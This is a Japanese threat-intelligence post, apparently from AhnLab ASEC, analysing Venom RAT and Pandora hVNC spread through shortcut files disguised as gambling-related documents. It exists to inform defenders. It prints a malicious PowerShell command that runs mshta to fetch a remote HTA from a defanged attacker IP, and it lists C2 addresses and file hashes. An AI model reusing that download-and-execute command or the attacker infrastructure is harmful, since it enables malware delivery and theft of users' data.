Posted By ,

賭博関連の内容を装って配布されている RAT マルウェア

AhnLab SEcurity intelligence Center(ASEC)は、RAT マルウェアが違法賭博関連のファイルに偽装して配布されていることを確認した。先月掲載した VenomRAT 配布方法 [1] と同じく、ショートカット(.lnk)ファイルを通じて配布され、HTA から RAT マルウェアを直接ダウンロードする。

図1. 動作プロセス

配布が確認されたショートカットファイルには、不正な PowerShell コマンドが含まれており、mshta を実行して不正なスクリプトをダウンロードする。

  • PowerShell コマンド
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.*  ‘hxxp://193.***.***[.]253:7287/2.hta.hta’
図2. LNK のプロパティ

確認されたショートカットファイルに含まれた不正な URL は、以下の通りである。

  • hxxp://193.***.***[.]253:7287/2.hta.hta
  • hxxp://193.***.***[.]253:7287/.hta
  • hxxp://85.209.176[.]158:7287/6.hta

hxxp://193.***.***[.]253:7287/2.hta.hta には従来と同じく VBS コードが存在する。VBS コードの内部には、正常なドキュメントファイルと RAT マルウェアをダウンロードするための PowerShell コマンドが難読化されている。デコードされた PowerShell コマンドは以下の通りである。

図3. デコードされた PowerShell コマンド

[図3]の PowerShell コマンドは、実行すると hxxp://193.***.***[.]253:7287/percent.xlsm から Excel ドキュメントをダウンロードして %APPDATA% フォルダーに percent.xlsm のファイル名で保存する。ダウンロードされた Excel ドキュメント(percent.xlsm)の本文には、[図4]のようにベット関連の方法が記載されており、関連ユーザーを対象に配布されていることがわかる。

이 이미지는 대체 속성이 비어있습니다. 그 파일 이름은 1-1024x565.png입니다
図4. percent.xlsm の本文内容

その後、hxxp://193.***.***[.]253:7287/darkss.exe からさらなる実行ファイルをダウンロードして %APPDATA% フォルダーに darkss.exe の名前で保存する。ダウンロードされた実行ファイルは Venom RAT マルウェアであり、キーロガーおよびユーザー情報の流出だけでなく、攻撃者からコマンドを受け取り様々な不正な振る舞いを実行することができる。

図5. darkss.exe(Venom RAT) のコードの一部
  • C2 : 193.***.***[.]253:4449

確認された URL(193.***.***[.]253:7287、85.209.176[.]158:7287)には、本文で説明した不正なファイル以外に、様々な不正 HTA スクリプトやデコイ(おとり)ドキュメントファイル、不正な実行ファイルが存在する。

図6. 不正な URL で確認された追加ファイルリスト

追加で確認されたデコイドキュメントもやはり、賭博サイト関連の情報を含んでおり、一部ユーザーの個人情報が含まれている。

図7. 追加で確認されたデコイドキュメント1(2023_12.xlsx)
図8. 追加で確認されたデコイドキュメント2(testDB.xlsx)

[図6]で確認された不正な実行ファイルである Darksoft111.exe と Pandora_cryptered.exe は、それぞれ Venom RAT と Pandora hVNC マルウェアであり、攻撃者は様々な種類の RAT マルウェアを使用しており、ユーザーは特に注意が必要である。

図9. Pandora_cryptered.exe(Pandora hVNC) のコードの一部

[ファイル検知]
Downloader/LNK.Generic.S2541(2024.01.25.02)
Downloader/HTA.Agent (2024.01.29.03)
Trojan/Win.PWSX-gen (2024.01.12.03)
Trojan/Win.Krypt (2024.01.29.03)

[振る舞い検知]
Execution/MDP.Powershell.M2514

[IOC 情報]
MD5
ac281f9830ee7f0a142cecc76fe59da9 (LNK)
20a88382040e47209e50652599d92440 (LNK)
cfe22644d656ca2fbdc44aaecb37fab9 (LNK)
15e98eb4a6fd73ff10cac751d467375e (HTA)
97e5b88cf1a452393c790ff84f08e3be (HTA)
9aa64f465c28e4d9af91af2fe2d29e5e (HTA)
04dc064b9e6fbc1466f5844c2dd422a4 (EXE)
a69f529f5fa414aba6af1f063ec7ce32 (EXE)
0bb437212ee1af602f7a34670825ff43 (EXE)
URL
hxxp://85.209.176[.]158:7287
85.209.176[.]158:1337
85.209.176[.]158:4449

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

Categories: マルウェアの情報